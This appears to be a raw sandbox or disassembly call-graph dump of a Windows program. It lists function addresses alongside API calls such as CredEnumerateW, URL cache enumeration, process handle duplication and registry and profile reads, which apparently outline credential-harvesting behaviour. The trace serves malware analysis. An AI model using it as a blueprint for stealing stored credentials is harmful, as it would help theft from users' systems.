27 API calls 38557->38560 38558 40bddf CredEnumerateW 38558->38557 38561 40be02 wcslen 38560->38561 38561->38555 38563 40be1e 38561->38563 38562 40be26 _wcsncoll 38562->38563 38563->38555 38563->38562 38566 40be7d memset 38563->38566 38567 40bea7 memcpy 38563->38567 38568 40bf11 wcschr 38563->38568 38569 40b2cc 27 API calls 38563->38569 38571 40bf43 LocalFree 38563->38571 39205 40bd5d 28 API calls 38563->39205 39206 404423 38563->39206 38566->38563 38566->38567 38567->38563 38567->38568 38568->38563 38570 40bef6 _wcsnicmp 38569->38570 38570->38563 38570->38568 38571->38563 38572 4135f7 39219 4135e0 38572->39219 38575 40b2cc 27 API calls 38576 41360d 38575->38576 38577 40a804 8 API calls 38576->38577 38578 413613 38577->38578 38579 41361b 38578->38579 38580 41363e 38578->38580 38581 40b273 27 API calls 38579->38581 38582 4135e0 FreeLibrary 38580->38582 38583 413625 GetProcAddress 38581->38583 38584 413643 38582->38584 38583->38580 38585 413648 38583->38585 38584->38350 38586 413658 38585->38586 38587 4135e0 FreeLibrary 38585->38587 38586->38350 38588 413666 38587->38588 38588->38350 39222 4449b9 38589->39222 38592 444c1f 38592->38327 38593 4449b9 42 API calls 38595 444b4b 38593->38595 38594 444c15 38597 4449b9 42 API calls 38594->38597 38595->38594 39243 444972 GetVersionExW 38595->39243 38597->38592 38598 444b99 memcmp 38603 444b8c 38598->38603 38599 444c0b 39247 444a85 42 API calls 38599->39247 38603->38598 38603->38599 39244 444aa5 42 API calls 38603->39244 39245 40a7a0 GetVersionExW 38603->39245 39246 444a85 42 API calls 38603->39246 38606 40399d 38605->38606 39248 403a16 38606->39248 38608 403a09 39262 40b1ab ??3@YAXPAX ??3@YAXPAX 38608->39262 38610 403a12 wcsrchr 38610->38342 38611 4039a3 38611->38608 38614 4039f4 38611->38614 39259 40a02c CreateFileW 38611->39259 38614->38608 38615 4099c6 2 API calls 38614->38615 38615->38608 38617 414c2e 16 API calls 38616->38617 38618 404048 38617->38618 38619 414c2e 16 API calls 38618->38619 38620 404056 38619->38620 38621 409d1f 6 API calls 38620->38621 38622 404073 38621->38622 38623 409d1f 6 API calls 38622->38623 38624 40408e 38623->38624 38625 409d1f 6 API calls 38624->38625 38626 4040a6 38625->38626 38627 403af5 20 API calls 38626->38627 38628 4040ba 38627->38628 38629 403af5 20 API calls 38628->38629 38630 4040cb 38629->38630 39289 40414f memset 38630->39289 38632 404140 39303 40b1ab ??3@YAXPAX ??3@YAXPAX 38632->39303 38634 4040ec memset 38637 4040e0 38634->38637 38635 404148 38635->38398 38636 4099c6 2 API calls 38636->38637 38637->38632 38637->38634 38637->38636 38638 40a8ab 9 API calls 38637->38638 38638->38637 39316 40a6e6 WideCharToMultiByte 38639->39316 38641 4087ed 39317 4095d9 memset 38641->39317 38644 408953 38644->38398 38645 408809 memset memset memset memset memset 38646 40b2cc 27 API calls 38645->38646 38647 4088a1 38646->38647 38648 409d1f 6 API calls 38647->38648 38649 4088b1 38648->38649 38650 40b2cc 27 API calls 38649->38650 38651 4088c0 38650->38651 38652 409d1f 6 API calls 38651->38652 38653 4088d0 38652->38653 38654 40b2cc 27 API calls 38653->38654 38655 4088df 38654->38655 38656 409d1f 6 API calls 38655->38656 38657 4088ef 38656->38657 38658 40b2cc 27 API calls 38657->38658 38659 4088fe 38658->38659 38660 409d1f 6 API calls 38659->38660 38661 40890e 38660->38661 38662 40b2cc 27 API calls 38661->38662 38663 40891d 38662->38663 38664 409d1f 6 API calls 38663->38664 38665 40892d 38664->38665 39336 409b98 GetFileAttributesW 38665->39336 38667 40893e 38668 408943 38667->38668 38669 408958 38667->38669 39337 407fdf 75 API calls 38668->39337 39338 409b98 GetFileAttributesW 38669->39338 38672 408964 38673 408969 38672->38673 38674 40897b 38672->38674 38691 40b633 ??3@YAXPAX 38690->38691 38692 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38691->38692 38693 413f00 Process32NextW 38692->38693 38694 413da5 OpenProcess 38693->38694 38695 413f17 FindCloseChangeNotification 38693->38695 38696 413df3 memset 38694->38696 38701 413eb0 38694->38701 38695->38436 39628 413f27 38696->39628 38698 413ebf ??3@YAXPAX 38698->38701 38699 4099f4 3 API calls 38699->38701 38701->38693 38701->38698 38701->38699 38702 413e37 GetModuleHandleW 38703 413e1f 38702->38703 38704 413e46 GetProcAddress 38702->38704 38703->38702 39633 413959 38703->39633 39649 413ca4 38703->39649 38704->38703 38706 413ea2 CloseHandle 38706->38701 38708 414c2e 16 API calls 38707->38708 38709 403eb7 38708->38709 38710 414c2e 16 API calls 38709->38710 38711 403ec5 38710->38711 38712 409d1f 6 API calls 38711->38712 38713 403ee2 38712->38713 38714 409d1f 6 API calls 38713->38714 38715 403efd 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 403f15 38716->38717 38718 403af5 20 API calls 38717->38718 38719 403f29 38718->38719 38720 403af5 20 API calls 38719->38720 38721 403f3a 38720->38721 38722 40414f 33 API calls 38721->38722 38723 403f4f 38722->38723 38724 403faf 38723->38724 38726 403f5b memset 38723->38726 38728 4099c6 2 API calls 38723->38728 38729 40a8ab 9 API calls 38723->38729 39663 40b1ab ??3@YAXPAX ??3@YAXPAX 38724->39663 38726->38723 38727 403fb7 38727->38382 38728->38723 38729->38723 38731 414c2e 16 API calls 38730->38731 38732 403d26 38731->38732 38733 414c2e 16 API calls 38732->38733 38734 403d34 38733->38734 38735 409d1f 6 API calls 38734->38735 38736 403d51 38735->38736 38737 409d1f 6 API calls 38736->38737 38738 403d6c 38737->38738 38739 409d1f 6 API calls 38738->38739 38740 403d84 38739->38740 38741 403af5 20 API calls 38740->38741 38742 403d98 38741->38742 38743 403af5 20 API calls 38742->38743 38744 403da9 38743->38744 38745 40414f 33 API calls 38744->38745 38746 403dbe 38745->38746 38747 403e1e 38746->38747 38748 403dca memset 38746->38748 38751 4099c6 2 API calls 38746->38751 38752 40a8ab 9 API calls 38746->38752 39664 40b1ab ??3@YAXPAX ??3@YAXPAX 38747->39664 38748->38746 38750 403e26 38750->38386 38751->38746 38752->38746 38754 414b81 9 API calls 38753->38754 38755 414c40 38754->38755 38756 414c73 memset 38755->38756 39665 409cea 38755->39665 38757 414c94 38756->38757 39668 414592 RegOpenKeyExW 38757->39668 38760 414c64 38760->38376 38762 414cc1 38763 414cf4 wcscpy 38762->38763 39669 414bb0 wcscpy 38762->39669 38763->38760 38765 414cd2 39670 4145ac RegQueryValueExW 38765->39670 38767 414ce9 RegCloseKey 38767->38763 38769 409d62 38768->38769 38770 409d43 wcscpy 38768->38770 38769->38418 38771 409719 2 API calls 38770->38771 38772 409d51 wcscat 38771->38772 38772->38769 38774 40aebe FindClose 38773->38774 38775 40ae21 38774->38775 38776 4099c6 2 API calls 38775->38776 38777 40ae35 38776->38777 38778 409d1f 6 API calls 38777->38778 38779 40ae49 38778->38779 38779->38453 38781 40ade0 38780->38781 38782 40ae0f 38780->38782 38781->38782 38783 40ade7 wcscmp 38781->38783 38782->38453 38783->38782 38784 40adfe wcscmp 38783->38784 38784->38782 38786 40ae18 9 API calls 38785->38786 38792 4453c4 38786->38792 38787 40ae51 9 API calls 38787->38792 38788 4453f3 38790 40aebe FindClose 38788->38790 38789 40add4 2 API calls 38789->38792 38791 4453fe 38790->38791 38791->38453 38792->38787 38792->38788 38792->38789 38793 445403 253 API calls 38792->38793 38793->38792 38795 40ae7b FindNextFileW 38794->38795 38796 40ae5c FindFirstFileW 38794->38796 38797 40ae94 38795->38797 38798 40ae8f 38795->38798 38796->38797 38800 40aeb6 38797->38800 38801 409d1f 6 API calls 38797->38801 38799 40aebe FindClose 38798->38799 38799->38797 38800->38453 38801->38800 38802->38385 38803->38439 38804->38420 38805->38420 38806->38454 38808 409c89 38807->38808 38808->38476 38809->38506 38811 413d39 38810->38811 38812 413d2f FreeLibrary 38810->38812 38813 40b633 ??3@YAXPAX 38811->38813 38812->38811 38814 413d42 38813->38814 38815 40b633 ??3@YAXPAX 38814->38815 38816 413d4a 38815->38816 38816->38335 38817->38339 38818->38388 38819->38402 38821 44db70 38820->38821 38822 40b6fc memset 38821->38822 38823 409c70 2 API calls 38822->38823 38824 40b732 wcsrchr 38823->38824 38825 40b743 38824->38825 38826 40b746 memset 38824->38826 38825->38826 38827 40b2cc 27 API calls 38826->38827 38828 40b76f 38827->38828 38829 409d1f 6 API calls 38828->38829 38830 40b783 38829->38830 39671 409b98 GetFileAttributesW 38830->39671 38832 40b792 38833 40b7c2 38832->38833 38834 409c70 2 API calls 38832->38834 39672 40bb98 38833->39672 38836 40b7a5 38834->38836 38838 40b2cc 27 API calls 38836->38838 38842 40b7b2 38838->38842 38839 40b837 FindCloseChangeNotification 38841 40b83e memset 38839->38841 38840 40b817 39706 409a45 GetTempPathW 38840->39706 39705 40a6e6 WideCharToMultiByte 38841->39705 38845 409d1f 6 API calls 38842->38845 38845->38833 38846 40b827 CopyFileW 38846->38841 38847 40b866 38848 444432 121 API calls 38847->38848 38849 40b879 38848->38849 38850 40bad5 38849->38850 38851 40b273 27 API calls 38849->38851 38852 40baeb 38850->38852 38853 40bade DeleteFileW 38850->38853 38854 40b89a 38851->38854 38855 40b04b ??3@YAXPAX 38852->38855 38853->38852 38856 438552 134 API calls 38854->38856 38857 40baf3 38855->38857 38858 40b8a4 38856->38858 38857->38412 38859 40bacd 38858->38859 38861 4251c4 137 API calls 38858->38861 38860 443d90 111 API calls 38859->38860 38860->38850 38884 40b8b8 38861->38884 38862 40bac6 39718 424f26 123 API calls 38862->39718 38863 40b8bd memset 39709 425413 17 API calls 38863->39709 38866 425413 17 API calls 38866->38884 38869 40a71b MultiByteToWideChar 38869->38884 38870 40a734 MultiByteToWideChar 38870->38884 38873 40b9b5 memcmp 38873->38884 38874 4099c6 2 API calls 38874->38884 38875 404423 37 API calls 38875->38884 38877 40bb3e memset memcpy 39719 40a734 MultiByteToWideChar 38877->39719 38878 4251c4 137 API calls 38878->38884 38881 40bb88 LocalFree 38881->38884 38884->38862 38884->38863 38884->38866 38884->38869 38884->38870 38884->38873 38884->38874 38884->38875 38884->38877 38884->38878 38885 40ba5f memcmp 38884->38885 39710 4253ef 16 API calls 38884->39710 39711 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38884->39711 39712 4253af 17 API calls 38884->39712 39713 4253cf 17 API calls 38884->39713 39714 447280 memset 38884->39714 39715 447960 memset memcpy memcpy memcpy 38884->39715 39716 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38884->39716 39717 447920 memcpy memcpy memcpy 38884->39717 38885->38884 38886->38414 38888 40aed1 38887->38888 38889 40aec7 FindClose 38887->38889 38888->38347 38889->38888 38891 4099d7 38890->38891 38892 4099da memcpy 38890->38892 38891->38892 38892->38397 38894 40b2cc 27 API calls 38893->38894 38895 44543f 38894->38895 38896 409d1f 6 API calls 38895->38896 38897 44544f 38896->38897 39811 409b98 GetFileAttributesW 38897->39811 38899 44545e 38900 445476 38899->38900 38901 40b6ef 252 API calls 38899->38901 38902 40b2cc 27 API calls 38900->38902 38901->38900 38903 445482 38902->38903 38904 409d1f 6 API calls 38903->38904 38905 445492 38904->38905 39812 409b98 GetFileAttributesW 38905->39812 38907 4454a1 38908 4454b9 38907->38908 38909 40b6ef 252 API calls 38907->38909 38908->38428 38909->38908 38910->38427 38911->38444 38912->38450 38913->38487 38914->38469 38915->38514 38916->38514 38917->38497 38918->38525 38919->38527 38920->38529 38922 414c2e 16 API calls 38921->38922 38923 40c2ae 38922->38923 38993 40c1d3 38923->38993 38928 40c3be 38945 40a8ab 38928->38945 38929 40afcf 2 API calls 38930 40c2fd FindFirstUrlCacheEntryW 38929->38930 38931 40c3b6 38930->38931 38932 40c31e wcschr 38930->38932 38933 40b04b ??3@YAXPAX 38931->38933 38934 40c331 38932->38934 38935 40c35e FindNextUrlCacheEntryW 38932->38935 38933->38928 38936 40a8ab 9 API calls 38934->38936 38935->38932 38937 40c373 GetLastError 38935->38937 38940 40c33e wcschr 38936->38940 38938 40c3ad FindCloseUrlCache 38937->38938 38939 40c37e 38937->38939 38938->38931 38941 40afcf 2 API calls 38939->38941 38940->38935 38942 40c34f 38940->38942 38943 40c391 FindNextUrlCacheEntryW 38941->38943 38944 40a8ab 9 API calls 38942->38944 38943->38932 38943->38938 38944->38935 39109 40a97a 38945->39109 38948 40a8cc 38948->38536 38949 40a8d0 7 API calls 38949->38948 39114 40b1ab ??3@YAXPAX ??3@YAXPAX 38950->39114 38952 40c3dd 38953 40b2cc 27 API calls 38952->38953 38954 40c3e7 38953->38954 39115 414592 RegOpenKeyExW 38954->39115 38956 40c3f4 38957 40c50e 38956->38957 38958 40c3ff 38956->38958 38972 405337 38957->38972 38959 40a9ce 4 API calls 38958->38959 38960 40c418 memset 38959->38960 39116 40aa1d 38960->39116 38963 40c471 38965 40c47a _wcsupr 38963->38965 38964 40c505 RegCloseKey 38964->38957 38966 40a8d0 7 API calls 38965->38966 38967 40c498 38966->38967 38968 40a8d0 7 API calls 38967->38968 38969 40c4ac memset 38968->38969 38970 40aa1d 38969->38970 38971 40c4e4 RegEnumValueW 38970->38971 38971->38964 38971->38965 39118 405220 38972->39118 38976 4099c6 2 API calls 38975->38976 38977 40a714 _wcslwr 38976->38977 38978 40c634 38977->38978 39175 405361 38978->39175 38981 40c65c wcslen 39178 4053b6 39 API calls 38981->39178 38982 40c71d wcslen 38982->38546 38984 40c713 39181 4053df 39 API calls 38984->39181 38985 40c677 38985->38984 39179 40538b 39 API calls 38985->39179 38988 40c6a5 38988->38984 38989 40c6a9 memset 38988->38989 38990 40c6d3 38989->38990 39180 40c589 43 API calls 38990->39180 38992->38543 38994 40ae18 9 API calls 38993->38994 39000 40c210 38994->39000 38995 40ae51 9 API calls 38995->39000 38996 40c264 38997 40aebe FindClose 38996->38997 38999 40c26f 38997->38999 38998 40add4 2 API calls 38998->39000 39005 40e5ed memset memset 38999->39005 39000->38995 39000->38996 39000->38998 39001 40c231 _wcsicmp 39000->39001 39002 40c1d3 35 API calls 39000->39002 39001->39000 39003 40c248 39001->39003 39002->39000 39018 40c084 22 API calls 39003->39018 39006 414c2e 16 API calls 39005->39006 39007 40e63f 39006->39007 39008 409d1f 6 API calls 39007->39008 39009 40e658 39008->39009 39019 409b98 GetFileAttributesW 39009->39019 39011 40e667 39012 40e680 39011->39012 39014 409d1f 6 API calls 39011->39014 39020 409b98 GetFileAttributesW 39012->39020 39014->39012 39015 40e68f 39016 40c2d8 39015->39016 39021 40e4b2 39015->39021 39016->38928 39016->38929 39018->39000 39019->39011 39020->39015 39042 40e01e 39021->39042 39023 40e593 39025 40e5b0 39023->39025 39026 40e59c DeleteFileW 39023->39026 39024 40e521 39024->39023 39065 40e175 39024->39065 39027 40b04b ??3@YAXPAX 39025->39027 39026->39025 39028 40e5bb 39027->39028 39030 40e5c4 CloseHandle 39028->39030 39031 40e5cc 39028->39031 39030->39031 39033 40b633 ??3@YAXPAX 39031->39033 39032 40e573 39034 40e584 39032->39034 39035 40e57c FindCloseChangeNotification 39032->39035 39036 40e5db 39033->39036 39108 40b1ab ??3@YAXPAX ??3@YAXPAX 39034->39108 39035->39034 39039 40b633 ??3@YAXPAX 39036->39039 39038 40e540 39038->39032 39085 40e2ab 39038->39085 39040 40e5e3 39039->39040 39040->39016 39043 406214 22 API calls 39042->39043 39044 40e03c 39043->39044 39045 40e16b 39044->39045 39046 40dd85 74 API calls 39044->39046 39045->39024 39047 40e06b 39046->39047 39047->39045 39048 40afcf ??2@YAPAXI ??3@YAXPAX 39047->39048 39049 40e08d OpenProcess 39048->39049 39050 40e0a4 GetCurrentProcess DuplicateHandle 39049->39050 39054 40e152 39049->39054 39051 40e0d0 GetFileSize 39050->39051 39052 40e14a CloseHandle 39050->39052 39055 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39051->39055 39052->39054 39053 40e160 39057 40b04b ??3@YAXPAX 39053->39057 39054->39053 39056 406214 22 API calls 39054->39056 39058 40e0ea 39055->39058 39056->39053 39057->39045 39059 4096dc CreateFileW 39058->39059 39060 40e0f1 CreateFileMappingW 39059->39060 39061 40e140 CloseHandle CloseHandle 39060->39061 39062 40e10b MapViewOfFile 39060->39062 39061->39052 39063 40e13b FindCloseChangeNotification 39062->39063 39064 40e11f WriteFile UnmapViewOfFile 39062->39064 39063->39061 39064->39063 39066 40e18c 39065->39066 39067 406b90 11 API calls 39066->39067 39068 40e19f 39067->39068 39069 40e1a7 memset 39068->39069 39070 40e299 39068->39070 39075 40e1e8 39069->39075 39071 4069a3 ??3@YAXPAX ??3@YAXPAX 39070->39071 39072 40e2a4 39071->39072 39072->39038 39073 406e8f 13 API calls 39073->39075 39074 406b53 SetFilePointerEx ReadFile 39074->39075 39075->39073 39075->39074 39076 40e283 39075->39076 39077 40dd50 _wcsicmp 39075->39077 39081 40742e 8 API calls 39075->39081 39082 40aae3 wcslen wcslen _memicmp 39075->39082 39083 40e244 _snwprintf 39075->39083 39078 40e291 39076->39078 39079 40e288 ??3@YAXPAX 39076->39079 39077->39075 39080 40aa04 ??3@YAXPAX 39078->39080 39079->39078 39080->39070 39081->39075 39082->39075 39084 40a8d0 7 API calls 39083->39084 39084->39075 39086 40e2c2 39085->39086 39087 406b90 11 API calls 39086->39087 39098 40e2d3 39087->39098 39088 40e4a0 39089 4069a3 ??3@YAXPAX ??3@YAXPAX 39088->39089 39091 40e4ab 39089->39091 39090 406e8f 13 API calls 39090->39098 39091->39038 39092 406b53 SetFilePointerEx ReadFile 39092->39098 39093 40e489 39094 40aa04 ??3@YAXPAX 39093->39094 39095 40e491 39094->39095 39095->39088 39096 40e497 ??3@YAXPAX 39095->39096 39096->39088 39097 40dd50 _wcsicmp 39097->39098 39098->39088 39098->39090 39098->39092 39098->39093 39098->39097 39099 40dd50 _wcsicmp 39098->39099 39102 40742e 8 API calls 39098->39102 39103 40e3e0 memcpy 39098->39103 39104 40e3b3 wcschr 39098->39104 39105 40e3fb memcpy 39098->39105 39106 40e416 memcpy 39098->39106 39107 40e431 memcpy 39098->39107 39100 40e376 memset 39099->39100 39101 40aa29 6 API calls 39100->39101 39101->39098 39102->39098 39103->39098 39104->39098 39105->39098 39106->39098 39107->39098 39108->39023 39111 40a980 39109->39111 39110 40a8bb 39110->38948 39110->38949 39111->39110 39112 40a995 _wcsicmp 39111->39112 39113 40a99c wcscmp 39111->39113 39112->39111 39113->39111 39114->38952 39115->38956 39117 40aa23 RegEnumValueW 39116->39117 39117->38963 39117->38964 39119 405335 39118->39119 39120 40522a 39118->39120 39119->38546 39121 40b2cc 27 API calls 39120->39121 39122 405234 39121->39122 39123 40a804 8 API calls 39122->39123 39124 40523a 39123->39124 39163 40b273 39124->39163 39126 405248 _mbscpy _mbscat GetProcAddress 39127 40b273 27 API calls 39126->39127 39128 405279 39127->39128 39166 405211 GetProcAddress 39128->39166 39130 405282 39131 40b273 27 API calls 39130->39131 39132 40528f 39131->39132 39167 405211 GetProcAddress 39132->39167 39134 405298 39135 40b273 27 API calls 39134->39135 39136 4052a5 39135->39136 39168 405211 GetProcAddress 39136->39168 39138 4052ae 39139 40b273 27 API calls 39138->39139 39140 4052bb 39139->39140 39169 405211 GetProcAddress 39140->39169 39142 4052c4 39143 40b273 27 API calls 39142->39143 39144 4052d1 39143->39144 39170 405211 GetProcAddress 39144->39170 39146 4052da 39147 40b273 27 API calls 39146->39147 39148 4052e7 39147->39148 39171 405211 GetProcAddress 39148->39171 39150 4052f0 39151 40b273 27 API calls 39150->39151 39152 4052fd 39151->39152 39172 405211 GetProcAddress 39152->39172 39154 405306 39155 40b273 27 API calls 39154->39155 39156 405313 39155->39156 39173 405211 GetProcAddress 39156->39173 39158 40531c 39159 40b273 27 API calls 39158->39159 39160 405329 39159->39160 39174 405211 GetProcAddress 39160->39174 39162 405332 39162->39119 39164 40b58d 27 API calls 39163->39164 39165 40b18c 39164->39165 39165->39126 39166->39130 39167->39134 39168->39138 39169->39142 39170->39146 39171->39150 39172->39154 39173->39158 39174->39162 39176 405220 39 API calls 39175->39176 39177 405369 39176->39177 39177->38981 39177->38982 39178->38985 39179->38988 39180->38984 39181->38982 39183 40440c FreeLibrary 39182->39183 39184 40436d 39183->39184 39185 40a804 8 API calls 39184->39185 39186 404377 39185->39186 39187 404383 39186->39187 39188 404405 39186->39188 39189 40b273 27 API calls 39187->39189 39188->38555 39188->38557 39188->38558 39190 40438d GetProcAddress 39189->39190 39191 40b273 27 API calls 39190->39191 39192 4043a7 GetProcAddress 39191->39192 39193 40b273 27 API calls 39192->39193 39194 4043ba GetProcAddress 39193->39194 39195 40b273 27 API calls 39194->39195 39196 4043ce GetProcAddress 39195->39196 39197 40b273 27 API calls 39196->39197 39198 4043e2 GetProcAddress 39197->39198 39199 4043f1 39198->39199 39200 4043f7 39199->39200 39201 40440c FreeLibrary 39199->39201 39200->39188 39201->39188 39203 404413 FreeLibrary 39202->39203 39204 40441e 39202->39204 39203->39204 39204->38572 39205->38563 39207 40442e 39206->39207 39208 40447e 39206->39208 39209 40b2cc 27 API calls 39207->39209 39208->38563 39210 404438 39209->39210 39211 40a804 8 API calls 39210->39211 39212 40443e 39211->39212 39213 404445 39212->39213 39214 404467 39212->39214 39215 40b273 27 API calls 39213->39215 39214->39208 39216 404475 FreeLibrary 39214->39216 39217 40444f GetProcAddress 39215->39217 39216->39208 39217->39214 39218 404460 39217->39218 39218->39214 39220 4135f6 39219->39220 39221 4135eb FreeLibrary 39219->39221 39220->38575 39221->39220 39223 4449c4 39222->39223 39224 444a52 39222->39224 39225 40b2cc 27 API calls 39223->39225 39224->38592 39224->38593 39226 4449cb 39225->39226 39227 40a804 8 API calls 39226->39227 39228 4449d1 39227->39228 39229 40b273 27 API calls 39228->39229 39230 4449dc GetProcAddress 39229->39230 39231 40b273 27 API calls 39230->39231 39232 4449f3 GetProcAddress 39231->39232 39233 40b273 27 API calls 39232->39233 39234 444a04 GetProcAddress 39233->39234 39235 40b273 27 API calls 39234->39235 39236 444a15 GetProcAddress 39235->39236 39237 40b273 27 API calls 39236->39237 39238 444a26 GetProcAddress 39237->39238 39239 40b273 27 API calls 39238->39239 39240 444a37 GetProcAddress 39239->39240 39241 40b273 27 API calls 39240->39241 39242 444a48 GetProcAddress 39241->39242 39242->39224 39243->38603 39244->38603 39245->38603 39246->38603 39247->38594 39249 403a29 39248->39249 39263 403bed memset memset 39249->39263 39251 403ae7 39276 40b1ab ??3@YAXPAX ??3@YAXPAX 39251->39276 39252 403a3f memset 39258 403a2f 39252->39258 39254 403aef 39254->38611 39255 409b98 GetFileAttributesW 39255->39258 39256 40a8d0 7 API calls 39256->39258 39257 409d1f 6 API calls 39257->39258 39258->39251 39258->39252 39258->39255 39258->39256 39258->39257 39260 40a051 GetFileTime FindCloseChangeNotification 39259->39260 39261 4039ca CompareFileTime 39259->39261 39260->39261 39261->38611 39262->38610 39264 414c2e 16 API calls 39263->39264 39265 403c38 39264->39265 39266 409719 2 API calls 39265->39266 39267 403c3f wcscat 39266->39267 39268 414c2e 16 API calls 39267->39268 39269 403c61 39268->39269 39270 409719 2 API calls 39269->39270 39271 403c68 wcscat 39270->39271 39277 403af5 39271->39277 39274 403af5 20 API calls 39275 403c95 39274->39275 39275->39258 39276->39254 39278 403b02 39277->39278 39279 40ae18 9 API calls 39278->39279 39287 403b37 39279->39287 39280 403bdb 39282 40aebe FindClose 39280->39282 39281 40add4 wcscmp wcscmp 39281->39287 39283 403be6 39282->39283 39283->39274 39284 40ae18 9 API calls 39284->39287 39285 40ae51 9 API calls 39285->39287 39286 40aebe FindClose 39286->39287 39287->39280 39287->39281 39287->39284 39287->39285 39287->39286 39288 40a8d0 7 API calls 39287->39288 39288->39287 39290 409d1f 6 API calls 39289->39290 39291 404190 39290->39291 39304 409b98 GetFileAttributesW 39291->39304 39293 40419c 39294 4041a7 6 API calls 39293->39294 39295 40435c 39293->39295 39297 40424f 39294->39297 39295->38637 39297->39295 39298 40425e memset 39297->39298 39300 409d1f 6 API calls 39297->39300 39301 40a8ab 9 API calls 39297->39301 39305 414842 39297->39305 39298->39297 39299 404296 wcscpy 39298->39299 39299->39297 39300->39297 39302 4042b6 memset memset _snwprintf wcscpy 39301->39302 39302->39297 39303->38635 39304->39293 39308 41443e 39305->39308 39307 414866 39307->39297 39309 41444b 39308->39309 39310 414451 39309->39310 39311 4144a3 GetPrivateProfileStringW 39309->39311 39312 414491 39310->39312 39313 414455 wcschr 39310->39313 39311->39307 39314 414495 WritePrivateProfileStringW 39312->39314 39313->39312 39315 414463 _snwprintf 39313->39315 39314->39307 39315->39314 39316->38641 39318 40b2cc 27 API calls 39317->39318 39319 409615 39318->39319 39320 409d1f 6 API calls 39319->39320 39321 409625 39320->39321 39346 409b98 GetFileAttributesW 39321->39346 39323 409634 39324 409648 39323->39324 39347 4091b8 memset 39323->39347 39326 40b2cc 27 API calls 39324->39326 39328 408801 39324->39328 39327 40965d 39326->39327 39329 409d1f 6 API calls 39327->39329 39328->38644 39328->38645 39330 40966d 39329->39330 39399 409b98 GetFileAttributesW 39330->39399 39332 40967c 39332->39328 39333 409681 39332->39333 39400 409529 72 API calls 39333->39400 39335 409690 39335->39328 39336->38667 39337->38644 39338->38672 39346->39323 39401 40a6e6 WideCharToMultiByte 39347->39401 39349 409202 39402 444432 39349->39402 39352 40b273 27 API calls 39353 409236 39352->39353 39448 438552 39353->39448 39356 409383 39358 40b273 27 API calls 39356->39358 39360 409399 39358->39360 39359 409254 39362 438552 134 API calls 39360->39362 39380 4093a3 39362->39380 39366 4094ff 39477 443d90 39366->39477 39369 4251c4 137 API calls 39369->39380 39371 409507 39379 40951d 39371->39379 39497 408f2f 77 API calls 39371->39497 39373 4093df 39476 424f26 123 API calls 39373->39476 39377 4253cf 17 API calls 39377->39380 39379->39324 39380->39366 39380->39369 39380->39373 39380->39377 39382 4093e4 39380->39382 39474 4253af 17 API calls 39382->39474 39389 4093ed 39475 4253af 17 API calls 39389->39475 39392 4093f9 39392->39373 39393 409409 memcmp 39392->39393 39393->39373 39399->39332 39400->39335 39401->39349 39498 4438b5 39402->39498 39404 44444c 39410 409215 39404->39410 39512 415a6d 39404->39512 39406 4442e6 11 API calls 39408 44469e 39406->39408 39407 444486 39409 4444b9 memcpy 39407->39409 39447 4444a4 39407->39447 39408->39410 39412 443d90 111 API calls 39408->39412 39516 415258 39409->39516 39410->39352 39410->39379 39412->39410 39413 444524 39414 444541 39413->39414 39415 44452a 39413->39415 39519 444316 39414->39519 39416 416935 16 API calls 39415->39416 39416->39447 39419 444316 18 API calls 39420 444563 39419->39420 39421 444316 18 API calls 39420->39421 39422 44456f 39421->39422 39423 444316 18 API calls 39422->39423 39424 44457f 39423->39424 39424->39447 39533 432d4e 39424->39533 39447->39406 39586 438460 39448->39586 39450 409240 39450->39356 39451 4251c4 39450->39451 39598 424f07 39451->39598 39453 4251e4 39454 4251f7 39453->39454 39455 4251e8 39453->39455 39606 4250f8 39454->39606 39605 4446ea 11 API calls 39455->39605 39457 4251f2 39457->39359 39459 425209 39474->39389 39475->39392 39476->39366 39478 443da3 39477->39478 39479 443db6 39477->39479 39622 41707a 11 API calls 39478->39622 39479->39371 39481 443da8 39482 443dbc 39481->39482 39483 443dac 39481->39483 39497->39379 39499 4438d0 39498->39499 39510 4438c9 39498->39510 39500 415378 memcpy memcpy 39499->39500 39501 4438d5 39500->39501 39502 4154e2 10 API calls 39501->39502 39503 443906 39501->39503 39501->39510 39502->39503 39504 443970 memset 39503->39504 39503->39510 39507 44398b 39504->39507 39505 4439a0 39506 415700 10 API calls 39505->39506 39505->39510 39508 4439c0 39506->39508 39507->39505 39509 41975c 10 API calls 39507->39509 39508->39510 39511 418981 10 API calls 39508->39511 39509->39505 39510->39404 39511->39510 39513 415a77 39512->39513 39514 415a8d 39513->39514 39515 415a7e memset 39513->39515 39514->39407 39515->39514 39517 4438b5 11 API calls 39516->39517 39518 41525d 39517->39518 39518->39413 39520 444328 39519->39520 39521 444423 39520->39521 39522 44434e 39520->39522 39523 4446ea 11 API calls 39521->39523 39524 432d4e memset memset memcpy 39522->39524 39530 444381 39523->39530 39525 44435a 39524->39525 39527 444375 39525->39527 39532 44438b 39525->39532 39526 432d4e memset memset memcpy 39528 4443ec 39526->39528 39529 416935 16 API calls 39527->39529 39528->39530 39531 416935 16 API calls 39528->39531 39529->39530 39530->39419 39531->39530 39532->39526 39587 41703f 11 API calls 39586->39587 39588 43847a 39587->39588 39589 43848a 39588->39589 39590 43847e 39588->39590 39592 438270 134 API calls 39589->39592 39591 4446ea 11 API calls 39590->39591 39594 438488 39591->39594 39593 4384aa 39592->39593 39593->39594 39595 424f26 123 API calls 39593->39595 39594->39450 39596 4384bb 39595->39596 39597 438270 134 API calls 39596->39597 39597->39594 39599 424f1f 39598->39599 39600 424f0c 39598->39600 39602 424eea 11 API calls 39599->39602 39601 416760 11 API calls 39600->39601 39603 424f18 39601->39603 39604 424f24 39602->39604 39603->39453 39604->39453 39605->39457 39607 425108 39606->39607 39613 42510d 39606->39613 39608 424f74 124 API calls 39607->39608 39608->39613 39609 42569b 125 API calls 39610 42516e 39609->39610 39611 425115 39611->39459 39613->39609 39613->39611 39622->39481 39655 413f4f 39628->39655 39631 413f37 K32GetModuleFileNameExW 39632 413f4a 39631->39632 39632->38703 39634 413969 wcscpy 39633->39634 39635 41396c wcschr 39633->39635 39647 413a3a 39634->39647 39635->39634 39637 41398e 39635->39637 39660 4097f7 wcslen wcslen _memicmp 39637->39660 39639 41399a 39640 4139a4 memset 39639->39640 39641 4139e6 39639->39641 39661 409dd5 GetWindowsDirectoryW wcscpy 39640->39661 39643 413a31 wcscpy 39641->39643 39644 4139ec memset 39641->39644 39643->39647 39662 409dd5 